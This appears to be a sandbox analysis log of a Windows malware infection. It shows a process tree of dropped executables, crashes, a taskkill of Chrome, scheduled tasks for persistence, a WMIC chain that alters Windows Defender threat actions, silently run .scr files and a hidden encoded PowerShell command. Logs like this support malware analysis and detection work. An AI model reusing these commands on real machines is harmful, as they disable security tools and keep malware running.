C:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exe"C:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exe"2⤵PID:4940
-
C:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exeC:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exe3⤵PID:5416
-
-
-
C:\Users\Admin\Documents\rtnkcdFhGXFf_t4VoszrAhiB.exe"C:\Users\Admin\Documents\rtnkcdFhGXFf_t4VoszrAhiB.exe"2⤵PID:4916
-
-
C:\Users\Admin\Documents\KTZMQgjJckAGP4Q_f2aIAWSW.exe"C:\Users\Admin\Documents\KTZMQgjJckAGP4Q_f2aIAWSW.exe"2⤵PID:4932
-
-
C:\Users\Admin\Documents\l16rJS0dRn15nn2h6PWO3L2M.exe"C:\Users\Admin\Documents\l16rJS0dRn15nn2h6PWO3L2M.exe"2⤵PID:4908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 12243⤵
- Program crash
PID:7036
-
-
-
C:\Users\Admin\Documents\65miLOnNt8qLS6VsWqqtapXx.exe"C:\Users\Admin\Documents\65miLOnNt8qLS6VsWqqtapXx.exe"2⤵PID:4880
-
-
C:\Users\Admin\Documents\py6McDjQFhLs7YbfCr5U6GE0.exe"C:\Users\Admin\Documents\py6McDjQFhLs7YbfCr5U6GE0.exe"2⤵PID:4892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6563⤵
- Program crash
PID:4504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6723⤵
- Program crash
PID:912 -
C:\Users\Admin\Documents\ajt_VHJlqQ1L3yXqSH86NomE.exe"C:\Users\Admin\Documents\ajt_VHJlqQ1L3yXqSH86NomE.exe"4⤵PID:4200
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6283⤵
- Program crash
PID:4756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6323⤵
- Program crash
PID:4148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 10683⤵
- Program crash
PID:6548
-
-
-
C:\Users\Admin\Documents\qmeF0LJEiySslhxcq7VAIw6k.exe"C:\Users\Admin\Documents\qmeF0LJEiySslhxcq7VAIw6k.exe"2⤵PID:4848
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:6640
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5748
-
-
-
-
C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"2⤵PID:4856
-
C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"3⤵PID:5656
-
-
-
C:\Users\Admin\Documents\v0MKrQ5qmABvKx0_yjZ0pp1f.exe"C:\Users\Admin\Documents\v0MKrQ5qmABvKx0_yjZ0pp1f.exe"2⤵PID:4864
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2896
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"3⤵PID:5940
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02588bdad8e7.exeThu02588bdad8e7.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &1⤵PID:4056
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"2⤵PID:6004
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True3⤵PID:5920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:6624
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5348
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\3919232.scr"C:\Users\Admin\AppData\Roaming\3919232.scr" /S1⤵PID:5932
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"2⤵PID:4876
-
-
C:\Users\Admin\AppData\Roaming\3239495.scr"C:\Users\Admin\AppData\Roaming\3239495.scr" /S1⤵PID:6068
-
C:\Users\Admin\AppData\Roaming\3240121.scr"C:\Users\Admin\AppData\Roaming\3240121.scr" /S1⤵PID:5720
-
C:\Users\Admin\AppData\Roaming\4217321.scr"C:\Users\Admin\AppData\Roaming\4217321.scr" /S1⤵PID:5228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:6668